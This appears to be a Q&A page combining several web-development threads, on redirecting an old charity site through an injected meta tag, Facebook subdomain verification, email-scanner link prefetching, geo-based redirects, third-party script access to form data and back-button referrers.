301 Redirect with limited access to site - redirect

I've recently developed a new website for a local charity that organises an annual sporting event. With the event coming up in a few weeks we approached the previous/existing 'dev' company to either redirect the domain to the new site/server or transfer the domain to us.
This other 'company' is refusing to do anything, simply because they want to force the charity to stay with them, so that they get good local publicity.
So, we've purchased a new domain for the site but need to redirect the old site to the new one. Unfortunately the system the old web company uses is very poor and cumbersome. It also only give us access to files which form the content of a given page. It doesn't however give us any access to the site template / style elements of the site, nor does it give us access to things like .htacess file(s).
So, at the moment the best I've come up with is using the existing systems single input for the site description, to force in a meta refresh that will bump users over to the new domain/site. However, this isn't going to result in a permanent 301 redirect for users or search engines.
As such, I'm desperately hoping to come up with a way to force a 301 for all pages without directly accessing every page content file and manually adding in some sort of redirect.

Due to some crappy sitewide one size fits all unescaped metatag implementation, I was able to inject an additional metatag with a redirect to the new domain.

Related

How do you verify user-owned subdomains in Facebook?

As part of the upcoming changes to Facebook Ads, you now must verify ownership of your domain name.
We operate a SaaS platform where user content is hosted on subdomains (myaccount.example.com etc). We need these users to be able to verify ownership of their domain so they can track their own events. We have enabled them to add the meta tag on their domain, and this verifies okay.
<meta name="facebook-domain-verification" content="codefromfbhere" />
However, the problem is, when you go into 'Events manager' -> 'Aggregated event measurement' -> 'Configure web events', it shows me the root domain instead of the subdomain I just verified (e.g. example.com instead of myaccount.example.com).
This is possible, as Leadpages has achieved the same goal. When you add in a Leadpages subdomain, you're able to verify it via meta tag, and it shows the subdomain in the 'Web event configurations' area.
I don't see any extra headers that they have provided or anything else that would enable this.
How do you mark subdomains as independent from the eTLD+1?
I wanted to chime in with the perspective of someone who works for Facebook. For most businesses, even ones that host pages for other businesses, Aggregated Event Measurement without anything extra is the correct solution.
Advertisers who do not own their own domains will not be able to verify the domain for the purpose of event configuration in Ads Manager. Advertisers may consider purchasing their own domain to continue running their campaigns uninterrupted, or moving toward link clicks/landing page views for campaign optimization and reporting. We are currently investigating other solutions for this use case but do not have any additional information to share at this time.
For a very small number of businesses already on the Public Suffix List (PSL) subdomains will be able to get data as if they were a root domain. This is because being on the PSL basically makes the root domain name act as if it was a TLD (such as “co.uk“ or ”gov.au“). In almost every case it does not make sense for sites to request to be added to the PSL as this dramatically changes how the Public Suffix listed domain name will function.
The PSL process is intended only for platform providers that provide subdomains for large numbers of small businesses which really ought to be treated as though they were in fact separate domains.
The Public Suffix List is not useful, nor intended to be used as a means to gain additional subdomain events reporting. Adding a domain name to the PSL means that there will be total cookie separation between subdomains and that cookies will become disabled on the root domain. If you a domain gets added to the PSL you'll not have much control for that site itself. For example, if you have a /login page on that domain. This may not work as it does today if you proceeded with a PSL addition, as cookies may get disabled on the root domain.
It’s also important to note that browsers will enforce the behavior described based on their own update cadence of the PSL. Some browsers don't update their lists more regularly than bi-annually. This means that if you're on the list and a browser updates their copy of the list, and you later decide to not be on the list, there may not be an easy way to back out the effects; it's not as simple as submitting another request to get taken off of the list.
More information can be found at Facebook’s help center article here.
[Update Mar 19 2021]
Facebook just announced they will be supporting the Public Suffix List for domain verification and event configuration. This means that merchants using a registered domain on the Public Suffix List will be able to use that domain for verifying and configuring their top 8 events on the domain. For example, if myplatform.com is a registered domain on the Public Suffix List, then Jasper, a merchant with the subdomain jasper.myplatform.com, would now qualify as an effective eTLD+1 and would be able to verify "jasper.myplatform.com" and use it to configure their top 8 events in the web events configuration tool.
Read more here:
https://developers.facebook.com/docs/sharing/domain-verification
[Original Answer]
For the upcoming changes for Apple iOS 14.5, you can only verify root domain, which is example.com in your example in order to setup the web event configurations.
The only way you can do this is provide your client's a way to buy/setup their own domain on your service.
You may watch the webinar recording here
https://www.facebook.com/business/m/sessionsforsuccess

Are URLs in emails indexed by search engines so they become publicly searchable?

I have read a few questions on here about e-mail clients prefetching URLs in e-mails. An answer to this seems to be to add a new confirmation page, where the user has to click a button to confirm the desired action.
But, this answer states the following:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
This effectively makes all one-time use links like
login/pass-reset/etc useless.
(Users of my service were complaining that one-time login links don't
work for some of them and it appeared that BingPreview/1.0b is hitting
the URL before the user even opens the inbox)
Drupal seems to be experiencing the same problem:
https://www.drupal.org/node/2828034
My major concern is with this statement:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
If this is the case, any URL in an e-mail meant to confirm an action, e.g. confirming a login, subscription, or unsubscription, can end up searchable in a search engine, if that's whats meant by indexed in the quote above. In this case, it's Bing. Not even a dedicated confirmation page where the user confirms the desired action truly mitigates this.
Scenario #1
If I email the user a login link with a one-time token in the URL, that URL will end up in Bing. This token will have a short lifetime, lets say 5 minutes, so I doubt anyone will manage to search on Bing and find the URL before the user clicks it or it expires.
Scenario #2
The user gets an e-mail with a link to confirm a subscription. This link is perhaps valid for 24 hours. This might(?) be long enough for someone else to stumble over the link on a search engine and accidentally (or on purpose) confirm the subscription on behalf of the user.
Scenario #2 is not uncommon, it's even best practice to use double opt-in as far as I am aware.
Scenario #3
Unsubscribe URLs in the bottom of newsletters. Maybe valid for forever? You don't want this publicly searchable in an search engine.
Assume all the one-time confirmation links land on a confirmation page where the user confirms the desired action.
Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing? And will they actually end up publicly searchable? If not, what is meant by indexed in the quote above?
I'll add for the sake of completion that I don't think I've had much of a problem with this in my own use of the web, so my gut feeling is that this is unlikely the case.
Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing?
I can't definitely say if they are being indexed or not, only Bing could answer this question, but they are surely being visited, at least with a simple GET request. I just tested this sending myself a link to a page on my website that logs the requests that are made against it, and indeed I'm seeing a GET coming from 207.46.13.181 (reverse DNS says msnbot-207-46-13-181.search.msn.com), which suggests that an automated program from search.msn.com is crawling the link. This leads me to believe that yes, they are trying to index the link's content somehow, but it's only my opinion really.
And will they actually end up publicly searchable? If not, what is meant by "indexed" in the quote above?
Well, again, impossible to say unless you work for Bing. In any case, "indexing" means exactly what you think it does: parsing the content of a page to potentially include it in search results.
The real question here is: does this somehow represent a security problem or will it compromise my website's functionality?
It surely has the potential to: if your confirmation/reset/subscription/whatever process only relies on a single GET request with the appropriate GET parameter, then you should definitely revisit the strategy, as it obviously allows anyone to perform the action (even maliciously for example enumerating possible IDs for your GET parameters).
If the link you are trying to send contains sensible information or can be used to alter important data for an user of your website, then you should at least put it behind a login page only giving access to the interested user. This way, anyone who wants to access it (including search engines) will be redirected to a login page if not already logged in.
If the link you are trying to send is just some kind of harmless confirmation link (e.g. subscribe/unsubscribe from a newsletter), then at least use a form inside the web page to do the actual confirmation through a POST request (possibly also using a CSRF token), otherwise you will unequivocally end up with false positives.

How to redirect a website according to country's IP address

I'm working on a messenger app whose server side code is developed in Erlang.
The problem which I'm facing is regarding redirection of website according to country specific domain.
For example: when user's types google.co in message box, it automatically displays google.co.uk, how can I redirect it to google.co.in if I'm in India?
For finding country's location, I found this library on github: https://github.com/mochi/egeoip
How can I use this geoLocation for redirecting to particular country specific website?
ScreenShot, when I entered facebook.com, it automatically displays preview in my local language.
But in case of my app, it shows preview in some foreign language, russian maybe.
I've read the comments, and since you are not considering having datasets as an option, I think what you may want to do is something like this:
First thing to understand is how those previews work. In any (popular) messaging app, if you type in a URL, the app will send a request to the URL and get the website metadata. Then it will be displayed in the UI.
The country detection, is a bit more complicated and done in a variety of ways. But thankfully, you (almost) don't have to do anything. This is a rather long topic, but I'll try to shorten it out.
Text Localization
In some websites (might be the case of Facebook's in your example), they do country detection on the application layer, and then based on that country, it will use a specific language for the website's text. This all usually happens before the website renders it's content, so you do not have to worry about it.
GeoDNS
This one occurs on the DNS layer, and probably the most popular. Domain names can be assigned a handful of IP addresses. These IPs can point to different versions of the website, and in the case of GeoDNS it will be up to the DNS manager to assign a country to an IP. So when a DNS query came from Russia, the requesting IP's country will be resolved and then the IP assigned to it (if any) will be returned. This is used by websites especially for country-specific features or content. Best example is Netflix.
Redirects
In case of Google redirecting you to a different domain, this might be how they do it. Country is being resolved via the IP address in the application (HTTP) layer, and then does a 301/302 redirect, pointing to the new domain name. This one, you may need to do something on. So given that your application needs to do an HTTP request to the URL the user has entered, if it returns a redirect, you must follow it. Many HTTP libs/clients already does this, but on some you might have to explicitly turn on the option to follow redirects.
One important thing to note is to do the HTTP request on the client side. Otherwise, you will be resolving to the same country (where your server resides) regardless of where your user is.

Google Analytics - can it collect form data?

Simple scenario:
I have a signup form, with user name, password, email address, may be credit card number.
At the bottom of the page, I implement the Google Analytics code.
when user clicks submit, it goes to a page wihtout google analytics.
question is..
can GA get the data (user naem, password..email..etc) in the first form after user input the data?
Do they say anything about it in their TOS or Privacy policy?
Yes. Any <script> you include in the page has complete access to alter the user's interaction with the site due to the Same Origin Policy. Google, if they were feeling Evil today, could certainly rewrite the action of your <form> to point to themselves, or log every keypress, or create an <iframe> containing another page on your site and simulate the user clicking on any action in that page.
Do not include <script> on any page from a party you don't completely trust with the security of everything on your site. Even a single tracking or advertiser script on any page compromises everything on the same hostname (and maybe other subdomains if you are setting window.domain to allow cross-hostname-scripting, or sharing cookies between hostnames).
However, the Analytics script doesn't currently do any of these things and the form submission will not flow to Google as a matter of course; they would have to deliberately act to steal the data. Clearly it would be disastrous for them to be discovered doing it, so they presumably won't. But technically, they could. It always pains me to see third-party ad and tracking scripts on bank sites.
UPDATE: The landscape has changed quite a bit over the years since my original answer below was written: the scripts are now generally served (or at least have the option to be fetched) over HTTPS, so those scripts should be secure against the trivial man-in-the-middle attacks. However, you are still trusting the script source not to do malicious stuff in your page, since they still get to fully control what happens on your web page.
Original answer:
Yes. I recommend against putting any third party script on sensitive pages secured by SSL. It's not likely that Google is going to hijack sensitive data on your page but you should take into account the possibility that a malicious ISP can hijack the request (say, using DNS) to Google Analytics script and do whatever it wants on your page.

is it possible to know where the user is coming from when he uses the back button?

For example,
if user goes to google -> example.com -> newwebsite.com
If he goes back to example.com, the http-referrer page will still be google.com
How can I detect that he went to newwebsite.com
I believe that the back button will send the HTTP headers that were sent to the site the first time around, since it's not really a new visit.
Say you displayed an error page if the user's http-referrer was newwebsite.com. The first time they visited, they would get your site. If they went to newwebsite.com, and then hit back (meaning they wanted to go back in time, through their browser history, not load the page again with new headers), then they would get an error page, and the nature of the back button would be defeated. I don't know if this inspires that behavior or not, it just makes sense to me that way.
Maybe it's possible, but it would be entirely browser-dependent. Why do you need this functionality, anyway? Newwebsite isn't referring the user to your website at all, there's no connection between the two at all--it just happens to be the last page that the user visited.
If a visitor uses the back button, the page might be loaded from browser cache. In that case, no referrer is sent.
Using google analytics, you can see how many visitors came from a given web site. This might give you some information.
I don't believe that this is generally possible. You could pull tricks with javascript on your site so that all the links navigated from there could be detected and recorded, but once the users off your site you've got no control.
If you provided the browser, ie. developed your one yourself, then you could choose to expose the browser history via an api.
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
Describes a technique for exploiting the browsers agreement to modify links to indicate that they have been traversed (eg. changing the colour of the link) so that visited sites can be detected, however this only works for a pre-declared set of links, it's not a generally applicable approach.
My feeling is that attempts to hide the nature of browsers - users can hop around all over the place - tend to lead to unsatisfactory 79% solutions that mystify users.
What problem are you actually trying to solve?
You can use sessions inorder to track the path of pages.it really works wwell.try it.